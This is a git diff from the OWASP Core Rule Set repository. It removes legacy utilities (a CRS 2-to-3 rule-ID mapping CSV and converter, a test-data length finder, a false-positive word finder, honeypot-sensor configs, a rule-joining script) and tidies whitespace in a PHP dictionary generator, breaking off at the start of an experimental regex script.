-201183,000000
-201184,000000
-201185,000000
-201187,000000
-201188,000000
-201192,000000
-201193,000000
-201194,000000
-201195,000000
-201200,000000
-201201,000000
-201202,000000
-201203,000000
-201204,000000
-201206,000000
-201207,000000
-201209,000000
-201212,000000
-201213,000000
-201216,000000
-201218,000000
-201219,000000
-201221,000000
-201222,000000
-201233,000000
-201234,000000
-201235,000000
-201236,000000
-201237,000000
-201238,000000
-201239,000000
-201240,000000
-201241,000000
-201242,000000
-201243,000000
-201247,000000
-201248,000000
-201249,000000
-201256,000000
-201257,000000
-201258,000000
-201260,000000
-201265,000000
-201266,000000
-201267,000000
-201268,000000
-201269,000000
-201270,000000
-201271,000000
-201272,000000
-201274,000000
-201275,000000
-201279,000000
-201282,000000
-201283,000000
-201287,000000
-201288,000000
-201294,000000
-201295,000000
-201299,000000
-201308,000000
-201309,000000
-201310,000000
-201311,000000
-201312,000000
-201313,000000
-201315,000000
-201322,000000
-201323,000000
-201330,000000
-201331,000000
-201342,000000
-201343,000000
-201346,000000
-201347,000000
-900001,000000
-900002,000000
-900003,000000
-900004,000000
-900005,000000
-900006,000000
-900007,000000
-900008,000000
-900009,000000
-900010,000000
-900011,000000
-900012,000000
-900013,000000
-900014,000000
-900015,000000
-900016,000000
-900017,000000
-900018,000000
-900019,000000
-900020,000000
-900021,000000
-900030,000000
-900031,000000
-900032,000000
-900033,000000
-900034,000000
-900035,000000
-900036,000000
-900037,000000
-900038,000000
-900039,000000
-900040,000000
-900041,000000
-900042,000000
-900043,000000
-900044,000000
-900045,000000
-900046,000000
-900047,000000
-900048,000000
-900050,910100
-900051,910110
-900051,910120
-910006,000000
-910007,000000
-910008,000000
-920005,000000
-920006,000000
-920007,000000
-920008,000000
-920009,000000
-920010,000000
-920011,000000
-920012,000000
-920013,000000
-920014,000000
-920015,000000
-920016,000000
-920017,000000
-920018,000000
-920019,000000
-920020,000000
-920021,000000
-920022,000000
-920023,000000
-950000,943120
-950001,942150
-950002,000000
-950003,943110
-950005,930120
-950006,000000
-950007,000000
-950008,000000
-950009,943100
-950010,000000
-950011,000000
-950012,921100
-950018,000000
-950019,000000
-950020,000000
-950103,930100
-950104,930110
-950107,920220
-950108,920240
-950109,920230
-950110,000000
-950115,000000
-950116,920260
-950117,931100
-950118,931110
-950119,931120
-950120,931130
-950801,920250
-950901,942130
-950907,932100
-950908,000000
-950910,921120
-950911,921130
-950912,921140
-950913,921150
-950914,921160
-950915,921110
-950921,000000
-950922,000000
-950923,000000
-958000,000000
-958001,000000
-958002,000000
-958003,000000
-958004,000000
-958005,000000
-958006,000000
-958007,000000
-958008,000000
-958009,000000
-958010,000000
-958011,000000
-958012,000000
-958013,000000
-958016,000000
-958017,000000
-958018,000000
-958019,000000
-958020,000000
-958022,000000
-958023,000000
-958024,000000
-958025,000000
-958026,000000
-958027,000000
-958028,000000
-958030,000000
-958031,000000
-958032,000000
-958033,000000
-958034,000000
-958036,000000
-958037,000000
-958038,000000
-958039,000000
-958040,000000
-958041,000000
-958045,000000
-958046,000000
-958047,000000
-958049,000000
-958051,000000
-958052,000000
-958054,000000
-958056,000000
-958057,000000
-958059,000000
-958230,920190
-958231,920200
-958291,000000
-958295,920210
-958297,000000
-958404,000000
-958405,000000
-958406,000000
-958407,000000
-958408,000000
-958409,000000
-958410,000000
-958411,000000
-958412,000000
-958413,000000
-958414,000000
-958415,000000
-958416,000000
-958417,000000
-958418,000000
-958419,000000
-958420,000000
-958421,000000
-958422,000000
-958423,000000
-958976,000000
-958977,933110
-958978,933000
-958979,933120
-958980,933130
-959070,942380
-959071,942390
-959072,942400
-959073,942410
-959151,933100
-960000,920120
-960001,000000
-960002,000000
-960003,000000
-960006,920330
-960007,920290
-960008,920280
-960009,920320
-960010,920420
-960011,920170
-960012,920180
-960014,000000
-960015,920300
-960016,920160
-960017,920350
-960018,000000
-960020,000000
-960021,920310
-960022,000000
-960024,942460
-960032,911100
-960034,920430
-960035,920440
-960038,920450
-960208,920370
-960209,920360
-960335,920380
-960341,920390
-960342,920400
-960343,920410
-960901,920270
-960902,000000
-960904,920340
-960911,920100
-960912,920130
-960913,000000
-960914,920140
-960915,920150
-970003,951100
-970004,954120
-970007,000000
-970008,000000
-970009,953100
-970010,000000
-970011,000000
-970012,000000
-970013,950130
-970014,952100
-970015,953110
-970016,000000
-970017,952110
-970017,954100
-970018,000000
-970021,000000
-970118,954110
-970901,950100
-970902,953120
-970903,000000
-970904,954130
-973300,941320
-973301,000000
-973302,000000
-973303,000000
-973304,000000
-973305,000000
-973306,000000
-973307,000000
-973308,000000
-973309,000000
-973310,000000
-973311,000000
-973312,000000
-973313,000000
-973314,000000
-973315,941190
-973316,000000
-973317,941300
-973318,941290
-973319,941310
-973320,941280
-973321,941270
-973322,941250
-973323,941240
-973324,941230
-973325,000000
-973326,941200
-973327,000000
-973328,000000
-973329,000000
-973330,000000
-973331,000000
-973332,941330
-973333,941340
-973334,000000
-973335,000000
-973336,941110
-973337,941120
-973338,941140
-973339,941130
-973340,941160
-973341,941170
-973342,941180
-973343,941100
-973344,941100
-973345,941220
-973346,941210
-973347,000000
-973348,941260
-973350,941150
-981000,000000
-981001,000000
-981003,000000
-981004,000000
-981005,000000
-981006,000000
-981007,000000
-981018,000000
-981020,901100
-981021,901110
-981022,000000
-981033,000000
-981034,000000
-981035,000000
-981036,000000
-981037,000000
-981038,000000
-981039,000000
-981040,000000
-981041,000000
-981042,000000
-981043,000000
-981044,912120
-981045,912130
-981046,912140
-981047,912150
-981048,912160
-981049,912170
-981050,000000
-981051,000000
-981052,000000
-981053,000000
-981054,000000
-981055,000000
-981056,000000
-981057,000000
-981058,000000
-981059,000000
-981060,000000
-981061,000000
-981062,000000
-981063,000000
-981064,000000
-981075,000000
-981076,000000
-981077,000000
-981078,000000
-981079,000000
-981080,000000
-981081,000000
-981082,000000
-981083,000000
-981084,000000
-981085,000000
-981086,000000
-981087,000000
-981088,000000
-981089,000000
-981090,000000
-981091,000000
-981092,000000
-981093,000000
-981094,000000
-981095,000000
-981096,000000
-981097,000000
-981098,000000
-981099,000000
-981100,000000
-981101,000000
-981102,000000
-981103,000000
-981104,000000
-981105,000000
-981110,000000
-981131,000000
-981132,000000
-981133,000000
-981134,000000
-981136,000000
-981137,000000
-981138,910140
-981139,910190
-981140,910000
-981141,910150
-981142,910160
-981143,910170
-981144,910180
-981145,000000
-981172,942420
-981173,942430
-981175,949100
-981176,949190
-981177,000000
-981178,000000
-981179,949110
-981180,949120
-981181,949130
-981182,949140
-981183,949150
-981184,949160
-981185,000000
-981186,949170
-981187,949180
-981188,000000
-981189,000000
-981190,000000
-981191,000000
-981192,000000
-981193,000000
-981194,000000
-981195,000000
-981196,000000
-981197,000000
-981198,000000
-981199,000000
-981200,959100
-981201,980100
-981202,980110
-981203,980120
-981204,980130
-981205,980140
-981219,000000
-981220,000000
-981221,000000
-981222,000000
-981223,000000
-981224,000000
-981227,920110
-981228,000000
-981229,000000
-981230,000000
-981231,942440
-981235,000000
-981236,000000
-981237,000000
-981238,000000
-981239,000000
-981240,942300
-981241,942230
-981242,942330
-981243,942370
-981244,942180
-981245,942260
-981246,942340
-981247,942360
-981248,942210
-981249,942310
-981250,942170
-981251,942350
-981252,942240
-981253,942320
-981254,942280
-981255,942190
-981256,942250
-981257,942200
-981260,942450
-981261,942100
-981270,942290
-981272,942160
-981276,942270
-981277,942220
-981300,000000
-981301,000000
-981302,000000
-981303,000000
-981304,000000
-981305,000000
-981306,000000
-981307,000000
-981308,000000
-981309,000000
-981310,000000
-981311,000000
-981312,000000
-981313,000000
-981314,000000
-981315,000000
-981316,000000
-981317,000000
-981318,942110
-981319,942120
-981320,942140
-981400,000000
-981401,000000
-981402,000000
-981403,000000
-981404,000000
-981405,000000
-981406,000000
-981407,000000
-990002,913100
-990012,000000
-990901,913110
-990902,913120
-999003,000000
-999004,000000
-999005,000000
-999006,000000
-999008,000000
-999010,000000
-999011,000000
-9700010,951110
-9700011,951120
-9700012,951130
-9700013,951140
-9700014,951150
-9700015,951160
-9700016,951170
-9700017,951180
-9700018,951190
-9700019,951200
-9700020,951210
-9700021,951220
-9700022,951230
-9700023,951240
-9700024,951250
-9700025,951260
diff --git a/util/crs2-renumbering/README b/util/crs2-renumbering/README
deleted file mode 100644
index fd1861dd2..000000000
--- a/util/crs2-renumbering/README
+++ /dev/null
@@ -1,30 +0,0 @@
-CRS 2.x to 3.x migration utility
-================================
-
-In CRS 3.0, we have renumbered the rules to be more logical and helpful.
-The new rule file names now correspond with the rule IDs in the file.
-First rule of a given file is usually 9XX100, then the rules continue
-in steps of ten. Related rules/siblings follow with a single digit
-change (9XX101, etc.).
-
-This utility replaces CRS 2 ruleIds with their CRS 3 counterparts.
-You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0
-or higher.
-
-Example usage:
-
-	./update.py -f your_old_modsec_conf.conf
-
-Rules which have been removed in CRS 3 are listed with the new ID 000000 in the
-CSV file. This means that the former rule is no longer part of CRS 3. If after
-replacement you find a string 000000 in your config files, you can likely
-remove that exclusion or special case.
-
-If you want to create your own tooling for this migration, you can use
-the file idNumbering.csv in this directory. It lists the old rule IDs of
-CRS 2.2, together with the corresponding rule IDs in CRS 3.0.
-
-A rule renumbering is painful for all existing installations. But we really
-think that the rule IDs lacked sense and reason, and we are confident future
-maintenance will be much easier once this is done. We do not plan to change
-rule IDs after this. We appreciate your understanding in this matter.
diff --git a/util/crs2-renumbering/update.py b/util/crs2-renumbering/update.py
deleted file mode 100755
index 42ea75b96..000000000
--- a/util/crs2-renumbering/update.py
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-
-
-"""This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering"""
-from __future__ import print_function
-import csv
-import argparse
-import os
-import sys
-
-def main():
-    """Main function that contains all the logic to relabel CRS IDs"""
-
-    id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv")
-
-    if not os.path.isfile(id_translation_file):
-        sys.stderr.write("We were unable to locate the ID translation CSV (idNumbering.csv) \
-            please place this is the same directory as this script\n")
-        sys.exit(1)
-
-    parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \
-        and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.")
-    parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \
-        help="the file to be renumbered")
-    args = parser.parse_args()
-
-    if not os.path.isfile((args.fname).encode('utf8')):
-        sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \
-            in, please check your path\n")
-        sys.exit(1)
-
-    fcontent = ""
-
-    try:
-        update_file = open((args.fname).encode('utf-8'), "r")
-        try:
-            fcontent = update_file.read()
-        finally:
-            update_file.close()
-    except IOError:
-        sys.stderr.write("There was an error opening the file you were trying to update")
-
-    if fcontent != "":
-        # CSV File
-        id_csv_file = open(id_translation_file, 'rt')
-        try:
-            reader = csv.reader(id_csv_file)
-            for row in reader:
-                fcontent = fcontent.replace(row[0], row[1])
-        finally:
-            id_csv_file.close()
-    print(fcontent)
-
-if __name__ == "__main__":
-    main()
diff --git a/util/find-max-datalen-in-tests/README.md b/util/find-max-datalen-in-tests/README.md
deleted file mode 100644
index 8f2dcd8b3..000000000
--- a/util/find-max-datalen-in-tests/README.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# Find the longest data in CRS test cases
-
-This page describes how can you find the longest data string in CRS test cases.
-
-## Goals
-
-Some rules check the `FILES_COMBINED_SIZE` against the `TX:COMBINED_FILE_SIZES` variable. To check these work as well, we need to set the `tx.combined_file_sizes` variable and send a payload which is greater than this value - see [this](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/README.md#requirements):
-
-```
-SecAction "id:900005,\
-  phase:1,\
-  nolog,\
-  pass,\
-  ctl:ruleEngine=DetectionOnly,\
-  ctl:ruleRemoveById=910000,\
-  setvar:tx.blocking_paranoia_level=4,\
-  setvar:tx.crs_validate_utf8_encoding=1,\
-  setvar:tx.arg_name_length=100,\
-  setvar:tx.arg_length=400,\
-  setvar:tx.combined_file_sizes=MAX_LEN"
-```
-
-In `modsecurity-crs-docker` [here](https://github.com/coreruleset/modsecurity-crs-docker/blob/master/src/opt/modsecurity/activate-rules.sh#L79-L82) is how the setting works.
-
-To configure the Github action, you need to set up this in CORERULESET/test/docker-compose.yaml:
-
-```
-   ...
-   COMBINED_FILE_SIZES=MAX_LEN
-   ...
-```
-
-## Usage
-
-To find the possible value of MAX_LEN, run this script with one mandatory, and one optional argument. The mandatory argument is the path of the CRS directory (the root). The optional argument is the `-i` or `--ignoretests`, where you can pass the test id what you want to skip - eg. you want to use the test to exceed the maximum length.
-
-```
-./find_max_datalen.py ../.. -i 920410-1
-```
-
-In this case, you pass the CRS root as parent dir, and skip the test id 920410-1, which wants to exceed the maximum length.
-
-## Prerequisites
-
-* Python3 interpreter
-* Py-YAML
-* CRS rule set
diff --git a/util/find-max-datalen-in-tests/find_max_datalen.py b/util/find-max-datalen-in-tests/find_max_datalen.py
deleted file mode 100755
index aab66ac76..000000000
--- a/util/find-max-datalen-in-tests/find_max_datalen.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/env python3
-
-# This file helps to find the longest data size in all test cases under
-# CORERULESET_ROOT/test/regression/tests directory.
-
-# You just have to pass the CORERULESET_ROOT as argument.
-# Optional argument can be passed -i or --ignoretests - the listed test
-# cases will skipped.
-
-# At the end, the script will print the longest length, and the rule where
-# the data is.
-
-
-import sys
-import os
-import os.path
-import yaml
-import argparse
-
-if __name__ == "__main__":
-
-    desc = """This script needs a mandatory argument where you pass the path to your
-coreruleset. Then it iterates through tests, and finds the longest request
-body (data) between test cases. To ignore a test case, pass the number of the
-test with '-i' or '--ignoretests', eg.: '... -i 920410-1'"""
-
-    parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter)
-    parser.add_argument('-i', '--ignoretests', metavar='ignoretests',
-                        help='Ignore listed rules, separated by comma', required=False,
-                        nargs=1)
-    parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str,
-                        help='Directory path to CRS')
-    args = parser.parse_args()
-
-    test_cases = {}
-    testpath = args.crspath.rstrip("/") + "/tests/regression/tests"
-
-    if not os.path.isdir(testpath):
-        print("Directory does not exist: %s" % (testpath))
-        sys.exit(1)
-
-    ignoretests = []
-    if args.ignoretests is not None:
-        ignoretests = args.ignoretests[0].split(",")
-
-    try:
-        max_len = 0
-        max_title = ""
-        for root, dirs, files in os.walk(testpath):
-            path = root.split(os.sep)
-            for file in files:
-                if file.endswith(".yaml"):
-                    with open(os.path.join(root, file)) as f:
-                        test = yaml.full_load(f)
-                        for t in test['tests']:
-                            title = t['test_title']
-                            for s in t['stages']:
-                                if 'stage' in s:
-                                    if 'input' in s['stage']:
-                                        if 'data' in s['stage']['input']:
-                                            if len(s['stage']['input']['data']) > max_len \
-                                                and title not in ignoretests:
-                                                max_len = len(s['stage']['input']['data'])
-                                                max_title = title
-        print("Longest data: %d in test %s" % (max_len, max_title))
-    except:
-        print("Can't open files in given path!")
-        print(sys.exc_info())
-        sys.exit(1)
diff --git a/util/fp-finder/english-extended.txt b/util/fp-finder/english-extended.txt
deleted file mode 100644
index 8a3c41b4a..000000000
--- a/util/fp-finder/english-extended.txt
+++ /dev/null
@@ -1,31 +0,0 @@
-basename
-checkdate
-chroot
-config
-crypto
-dir
-exp
-file_exists
-fileatime
-filectime
-filegroup
-fileinode
-filemtime
-fileowner
-fileperms
-filesize
-filetype
-idate
-is_a
-md5
-misc
-ord
-popen
-prev
-stat
-substr
-symlink
-syslog
-ucfirst
-unlink
-unset
diff --git a/util/fp-finder/spell.sh b/util/fp-finder/spell.sh
deleted file mode 100755
index 2e5dde3d0..000000000
--- a/util/fp-finder/spell.sh
+++ /dev/null
@@ -1,163 +0,0 @@
-#!/bin/bash
-
-# This program uses WordNet to find English words. The WordNet license:
-
-# WordNet Release 3.0 This software and database is being provided to you,
-# the LICENSEE, by Princeton University under the following license.
-# By obtaining, using and/or copying this software and database, you agree that you have read,
-# understood, and will comply with these terms and conditions.: Permission to use, copy,
-# modify and distribute this software and database and its documentation for any purpose and
-# without fee or royalty is hereby granted, provided that you agree to comply with
-# the following copyright notice and statements, including the disclaimer, and that the same
-# appear on ALL copies of the software, database and documentation, including modifications
-# that you make for internal use or for distribution.
-# WordNet 3.0 Copyright 2006 by Princeton University.
-# All rights reserved.
-# THIS SOFTWARE AND DATABASE IS PROVIDED "AS IS" AND PRINCETON UNIVERSITY MAKES NO REPRESENTATIONS
-# OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PRINCETON UNIVERSITY
-# MAKES NO REPRESENTATIONS OR WARRANTIES OF MERCHANT- ABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE
-# OR THAT THE USE OF THE LICENSED SOFTWARE, DATABASE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD
-# PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS.
-# The name of Princeton University or Princeton may not be used in advertising or publicity
-# pertaining to distribution of the software and/or database. Title to copyright in this
-# software, database and any associated documentation shall at all times remain with
-# Princeton University and LICENSEE agrees to preserve same.
-
-if ! command -v wn > /dev/null 2>&1; then
-    cat <<EOF
-This program requires WordNet to be installed. Aborting.
-
-The WordNet shell utility 'wn' can be obtained via the package
-manager of your choice (the package is usually called 'wordnet').
-EOF
-
-    exit 1
-fi
-
-check() {
-    if ! ${MACHINE_READABLE}; then
-        echo "-> checking ${datafile_name}"
-    fi
-
-    local datafile="${1}"
-    local datafile_name
-
-    if [ "${1}" = "-" ]; then
-        datafile="/dev/stdin"
-        datafile_name="stdin"
-    else
-        datafile_name="${datafile##*/}"
-    fi
-
-    local datafile="${1}"
-    local datafile_name
-
-    if [ "${1}" = "-" ]; then
-        datafile="/dev/stdin"
-        datafile_name="stdin"
-    else
-        datafile_name="${datafile##*/}"
-    fi
-
-    while read -r word; do
-        # wordnet exit code is equal to number of search results
-        if [ -n "${SUFFIX}" ]; then
-            word="$(sed -E "s/(.*)${SUFFIX}/\1/" <<<"${word}")"
-        fi
-        if ! grep -qE '^[A-Za-z]+$' <<<"${word}"; then
-            continue
-        fi
-
-        if ! wn "${word}" >/dev/null 2>&1; then
-            if ! ${MACHINE_READABLE}; then
-                printf "   \`- found English word via wn: "
-            fi
-            echo "${word}"
-        else
-            if ${USE_EXTENDED}; then
-                # shellcheck disable=SC2046
-                if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]; then
-                    if ! ${MACHINE_READABLE}; then
-                        printf "   \`- found English word via extended list: "
-                    fi
-                    echo "${word}"
-                fi
-            fi
-        fi
-    done <<<"$(sort "${datafile}" | uniq)"
-
-    if ! ${MACHINE_READABLE}; then
-        echo ""
-    fi
-}
-
-usage() {
-    cat <<EOF
-usage: spell.sh [-mhe] [file]
-    Finds English words in files that contain word lists.
-
-    The optional file argument is the path to a file you want to check. If omitted,
-    all files with the .data suffix in the rules directory will be searched.
-
-    -h, --help      Show this message and exit
-    -m, --machine   Print machine readable output
-    -e, --extended  English words are extended by a manual list
-    -s, --suffix    Regular expression for suffix to strip off words passed to wordnet
-EOF
-}
-
-SCRIPT_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
-EXTENDED_WORDS_LIST_PATH="${SCRIPT_DIR}/english-extended.txt"
-RULES_DIR="${SCRIPT_DIR}/../../rules/"
-
-MACHINE_READABLE=false
-USE_EXTENDED=false
-
-POSITIONAL_ARGS=()
-while [[ $# -gt 0 ]]; do
-    # shellcheck disable=SC2221,SC2222
-    case $1 in
-        -m|--machine)
-        MACHINE_READABLE=true
-        shift
-        ;;
-        -e|--extended)
-        USE_EXTENDED=true
-        shift
-        ;;
-        -s|--suffix)
-        shift
-        SUFFIX="${1}"
-        shift
-        ;;
-        -h|--help)
-        usage
-        exit 1
-        ;;
-        -*|--*)
-        if [ $# -eq 1 ]; then
-            POSITIONAL_ARGS+=("$1") # save positional arg
-            shift # past argument
-        else
-            echo "Unknown option $1"
-            usage
-            exit 1
-        fi
-        ;;
-        *)
-        POSITIONAL_ARGS+=("$1") # save positional arg
-        shift
-        ;;
-    esac
-done
-
-set -- "${POSITIONAL_ARGS[@]}" # restore positional parameters
-
-
-if [ -n "${1}" ]; then
-    check "${1}"
-else
-    for datafile in "${RULES_DIR}"*.data; do
-        check "${datafile}"
-    done
-fi
diff --git a/util/geo-location/README b/util/geo-location/README
deleted file mode 100644
index b9018fb90..000000000
--- a/util/geo-location/README
+++ /dev/null
@@ -1,5 +0,0 @@
-License
-The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database:
-
-This product includes GeoLite data created by MaxMind, available from
-  <a href="http://www.maxmind.com">http://www.maxmind.com</a>.
diff --git a/util/honeypot-sensor/README.md b/util/honeypot-sensor/README.md
deleted file mode 100644
index 66fc6af9b..000000000
--- a/util/honeypot-sensor/README.md
+++ /dev/null
@@ -1,14 +0,0 @@
-The purpose of these files is to turn your current ModSecurity host into
-a pseudo-honeypot sensor by doing the following:
-
-1. Instructs Apache to listen for traffic on multiple unused ports
-      - 8000
-      - 8080
-      - 8888
-2. Creates Apache virtual host containers to bind to these ports.
-3. If any traffic is received on these ports, then ModSecurity will
-   inspect the traffic by inheriting any rules specified in the main
-   Apache configuration.
-4. ModSecurity's Audit Engine will use the mlogc program to forward
-   the audit log entry onto the ModSecurity Project's central logging
-   server.
diff --git a/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/util/honeypot-sensor/mlogc-honeypot-sensor.conf
deleted file mode 100644
index b4afad140..000000000
--- a/util/honeypot-sensor/mlogc-honeypot-sensor.conf
+++ /dev/null
@@ -1,97 +0,0 @@
-##########################################################################
-# Required configuration
-#   At a minimum, the items in this section will need to be adjusted to
-#   fit your environment.  The remaining options are optional.
-##########################################################################
-
-# Points to the root of the installation. All relative
-# paths will be resolved with the help of this path.
-CollectorRoot       "/var/log/mlogc"
-
-# ModSecurity Console receiving URI. You can change the host
-# and the port parts but leave everything else as is.
-ConsoleURI          "http://204.13.200.239/rpc/auditLogReceiver"
-
-# Sensor credentials
-SensorUsername      "honeypot-sensor"
-SensorPassword      "test1234"
-
-# Base directory where the audit logs are stored.  This can be specified
-# as a path relative to the CollectorRoot, or a full path.
-LogStorageDir       "data"
-
-# Transaction log will contain the information on all log collector
-# activities that happen between checkpoints. The transaction log
-# is used to recover data in case of a crash (or if Apache kills
-# the process).
-TransactionLog      "mlogc-transaction.log"
-
-# The file where the pending audit log entry data is kept. This file
-# is updated on every checkpoint.
-QueuePath           "mlogc-queue.log"
-
-# The location of the error log.
-ErrorLog            "mlogc-error.log"
-
-# The location of the lock file.
-LockFile            "mlogc.lck"
-
-# Keep audit log entries after sending? (0=false 1=true)
-# NOTE: This is required to be set in SecAuditLog mlogc config if you
-# are going to use a secondary console via SecAuditLog2.
-KeepEntries         0
-
-
-##########################################################################
-# Optional configuration
-##########################################################################
-
-# The error log level controls how much detail there
-# will be in the error log. The levels are as follows:
-#   0 - NONE
-#   1 - ERROR
-#   2 - WARNING
-#   3 - NOTICE
-#   4 - DEBUG
-#   5 - DEBUG2
-#
-ErrorLogLevel       3
-
-# How many concurrent connections to the server
-# are we allowed to open at the same time? Log collector uses
-# multiple connections in order to speed up audit log transfer.
-# This is especially needed when the communication takes place
-# over a slow link (e.g. not over a LAN).
-MaxConnections      10
-
-# How many requests a worker will process before recycling itself.
-# This is to help prevent problems due to any memory leaks that may
-# exists.  If this is set to 0, then no maximum is imposed. The default
-# is 1000 requests per worker (the number of workers is controlled by the
-# MaxConnections limit).
-MaxWorkerRequests   1000
-
-# The time each connection will sit idle before being reused,
-# in milliseconds. Increase if you don't want ModSecurity Console
-# to be hit with too many log collector requests.
-TransactionDelay    50
-
-# The time to wait before initialization on startup in milliseconds.
-# Increase if mlogc is starting faster then termination when the
-# sensor is reloaded.
-StartupDelay        5000
-
-# How often is the pending audit log entry data going to be written
-# to a file. The default is 15 seconds.
-CheckpointInterval  15
-
-# If the server fails all threads will back down until the
-# problem is sorted. The management thread will periodically
-# launch a thread to test the server. The default is to test
-# once in 60 seconds.
-ServerErrorTimeout  60
-
-# The following two parameters are not used yet, but
-# reserved for future expansion.
-# KeepAlive         150
-# KeepAliveTimeout  300
diff --git a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
deleted file mode 100644
index 7002bb76e..000000000
--- a/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
+++ /dev/null
@@ -1,30 +0,0 @@
-#
-# Add in honeypot ports.
-# - These are common proxy ports used by attackers
-# - All traffic accepted on these ports are suspicious.
-#
-Listen 8000
-Listen 8080
-Listen 8888
-
-#
-# Create basic virtual host containers that will forward all traffic received
-# to the official ModSecurity Project honeypot logging host.
-#
-# - You should adjust the Document root location to an empty directory on your server
-# - Also adjust the path to your local ModSecurity mlogc program and for the
-#   mlogc-honeypot-sensor.conf file.
-# - Make sure you main SecAuditLogType is set to concurrent mode.
-#
-<VirtualHost *:8000 *:8080 *:8888>
-ServerName www.example1.com
-DocumentRoot "/usr/local/apache/honeypot-htdocs"
-<Directory "/usr/local/apache/honeypot-htdocs">
-    Options none
-    AllowOverride None
-    Order allow,deny
-    Allow from all
-</Directory>
-SecAuditEngine On
-SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf"
-</VirtualHost>
diff --git a/util/id-range b/util/id-range
deleted file mode 100644
index a58cf06e4..000000000
--- a/util/id-range
+++ /dev/null
@@ -1,2 +0,0 @@
-900000-2999999
-2000000-299999
diff --git a/util/join-multiline-rules/join.py b/util/join-multiline-rules/join.py
deleted file mode 100755
index 7a2fc4ce0..000000000
--- a/util/join-multiline-rules/join.py
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/usr/bin/env python
-#
-# This script reads all the rule files passed on the command line,
-# and outputs them, with each (multi-line) directive joined as a
-# single line.
-#
-# This can be used to work around a bug in Apache < 2.4.11 in
-# parsing long configuration directives.
-#
-# Usage:
-#
-#   util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined
-#
-# This produces a single 'rules.conf.joined' file that can be included
-# in buggy Apache versions. It is recommended to keep this file in the
-# rules/ directory (because it refers to .data files in that directory)
-# but give it a name not ending in .conf (so the file will not be
-# included in *.conf and you can re-run the command multiple times
-# without including its own output).
-#
-# Example:
-#
-#   SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" \
-#      "id:901120,\
-#      phase:1,\
-#      pass,\
-#      nolog,\
-#      setvar:tx.blocking_paranoia_level=1"
-#
-# will be outputted as:
-#
-#   SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.blocking_paranoia_level=1"
-#
-
-import fileinput, sys
-
-for line in fileinput.input():
-    line = line.strip()
-    if line == '':
-        sys.stdout.write("\n")
-        continue
-
-    if line[-1] == '\\':
-        sys.stdout.write(line[0:-1])
-    else:
-        sys.stdout.write(line)
-        sys.stdout.write("\n")
diff --git a/util/php-dictionary-gen/php-dictionary-creator.sh b/util/php-dictionary-gen/php-dictionary-creator.sh
index dcb0c55e7..0fea9a3fc 100755
--- a/util/php-dictionary-gen/php-dictionary-creator.sh
+++ b/util/php-dictionary-gen/php-dictionary-creator.sh
@@ -368,7 +368,7 @@ if [ "$DO_RULE_933161" == "1" ]; then
 	# Being 933161 a stricter sibling of 933160, 933160 entries are also added to 933161.
 	# We read the 933160 file skipping comments and empty lines. Entries are added to 933161 (if not already present).
 	grep -v '^#' "$RA_FILE_PATH$R933160_FILENAME" | awk NF | while read -r R933160_ENTRY; do
-		
+
 		if [ $(grep -c -E "^$R933160_ENTRY$" "$TMP_ENGLISH_WORDS") -eq 0 ]; then
 			# we have to add this function to 933161
 			echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME added to the stricter sibling $R933161_FILENAME"
@@ -376,7 +376,7 @@ if [ "$DO_RULE_933161" == "1" ]; then
 		else
 			echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME already present in the stricter sibling $R933161_FILENAME"
 		fi
-	
+
 	done
 
 	sort -o "$TMP_ENGLISH_WORDS" "$TMP_ENGLISH_WORDS"
@@ -473,7 +473,7 @@ if [ "$DO_RULE_933150" == "1" ]; then
 		else
 			echo "High-risk function \"$HIGH_RISK_FUNC\" already present in $R933150_FILENAME"
 		fi
-	
+
 	done
 	sort -o "$TMP_PHP_FUNCTIONS_FREQUENT" "$TMP_PHP_FUNCTIONS_FREQUENT"
 	echo "File $R933150_FILENAME updated."
diff --git a/util/regexp-tricks/negative-lookahead.py b/util/regexp-tricks/negative-lookahead.py
deleted file mode 100644
index 0145ef39e..000000000
--- a/util/regexp-tricks/negative-lookahead.py
+++ /dev/null
@@ -1,121 +0,0 @@
-import argparse
-
-# WARNING: This script is EXPERIMENTAL. Use with caution.
-#
-# Known issues:
-#   * At the moment, it will probably not work with more than two strings.
-#
-# Known limitations:
-#   * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique,
-#   make sure that subtrings of the negative lookahead are not harmful in any way.
-
-parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \
-    a regex that acts like a negative lookahead")
-parser.add_argument("strings", type=str, nargs='+',
-    help="the strings to convert into a negative lookahead")
-parser.add_argument("--prefix", type=str, default="",
-    help="sets a prefix for the resulting regex")
-parser.add_argument("--suffix", type=str, default="",
-    help="sets a suffix for the resulting regex")
-
